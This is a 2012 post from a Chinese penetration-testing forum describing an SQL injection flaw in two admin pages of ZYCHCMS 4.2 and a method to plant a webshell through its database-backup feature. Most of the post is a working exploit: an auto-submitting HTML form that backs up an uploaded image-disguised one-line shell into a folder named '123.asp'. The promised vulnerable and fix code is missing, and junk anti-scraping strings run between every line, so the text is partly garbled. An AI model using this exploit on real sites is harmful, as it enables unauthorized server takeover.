中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
. R3 Z% j8 h, K4 G' l% E5 E1 r
2 U" F5 t3 s, [5 K2 Y
: X, L; S$ |9 J' s( e. L
3 c8 m5 L/ q* G& a- E& C' R. W
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
0 T% I0 v, B4 v4 ^! H
①SQL注射漏洞
' \9 u4 ^) m# c" g2 W4 c
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
, X6 o$ e m) y J
漏洞原因:未过滤
: {- M: O! a5 x1 H2 z
漏洞代码:
( e9 H( E' x' \+ r$ S$ m0 v$ v
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
! I) K0 P2 }7 Q- n
修复方法:在文件开头加入代码
8 Y2 A/ t; ]1 x" B
9 @8 h4 ]5 t, H
6 U5 |+ u) w% h9 u+ n9 ]+ N7 \5 A
②后台拿WBSHELL
% v3 b" F. B* s# p, U2 R+ x
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
# Y/ B6 `5 h% j
这里在网上找了一个,改了下,将就着用。
3 v, P9 N z+ e
以下是代码本地提交代码
% a! A3 j U* O8 u3 |& I( p
$ Q: L) w7 t7 u# k7 }3 m3 g- p
6 ?4 S F6 w: A1 w7 p& F6 j. h7 Z
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
! T8 b d8 g3 G+ p- Y
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
* P+ \! d' }7 L K
<tr>
" S6 d! a( {) x8 L% [. r
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
4 r7 Z/ L- p5 d" X- w }; ]0 a; J
</tr>
1 w; m6 A6 }( }; r0 k) g7 ~
<tr>
" }" g1 k+ T& t& w4 ^( h/ p
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
/ X. S* b. c/ G+ k9 h9 c
</span>
3 U; ]. x+ f8 p4 g8 Y
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
/ d) x) t" S5 N4 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ L1 U- W; i1 n ]4 x2 D4 T8 k/ ~
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
/ u4 L8 |5 ]* o% | S: x1 b' C, j
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
6 u9 r) E0 k) E2 z7 O% v+ G/ q$ t U
<div align=”left”>
4 N% D! M0 p$ @; K! _
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
3 K c, y7 R' Q) A6 n3 X" \. s5 _
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
9 ?! s" \: x, }9 O
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
2 a) R1 ]; U3 Z* |" f z
</div></td>
" m0 ]' b0 ?/ C0 Z) V0 P, Z1 n
</tr>
% O/ [6 ^/ |: }. A" N1 g1 l/ V. b
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
7 O5 T# P& y# _' ]# T
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
/ a; K4 w# }1 ] M
<td class=”td”><div align=”left”>
, F4 X2 B+ k2 `- A
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
3 P& [1 _+ k1 Z. d
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! r* \- {; {; e; r% K5 \
</tr>
9 y3 V: A% b ^3 v2 \& y
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
. p. H: @9 h: {9 M2 @
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
) b) w- b7 ^: E% @9 D0 B- v& D4 C& Y
<td class=”td”><div align=”left”>
0 a4 d/ i- S; K9 ]
<input type=”submit” value=”确定备份” class=”btn”
$ Z4 L2 j5 ?& f3 a' |) h
</div></td>
, }+ S* P. {# ]( g" f- L) n \" @8 h
</tr>
Y% P' I) L; V9 F: X: S- q
</table></td></tr></form>
0 Y+ h1 N3 z3 k7 X- V4 S
</table>
1 ]/ \# d) c# I: l0 V
</td>
/ }$ K. q6 }2 Q: s0 \; t
</tr>
6 J2 r6 N! `6 W4 ~: d& b2 `5 v
</table>
0 A2 S1 j, d) \, S* R& y
<script>
. o9 r3 _" m S2 c* F% c
document.all.add.submit();
6 s9 B7 w8 _ ?& M& m2 E
</script>
# t; O$ ?! ^# P. X4 K0 e" o7 K6 J
* k. ?, K2 _# `& D; q; i; X
0 Z; j) h+ x$ O+ Y) [2 ^- D' X% u
0 M2 x# W. B0 | j X
5 E1 i/ m( G9 f r9 }6 E& g
. |9 o+ b% p" p# \% C: h* K9 ?4 l% `# S
5 M" R4 X# |3 y5 r+ K
" [0 m U, O* {8 \- ]- C2 U
2 a% r( d9 Z8 N% E) x
3 p' O2 m' {( L6 O
) t4 h0 P, [) f5 g; G+ ]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2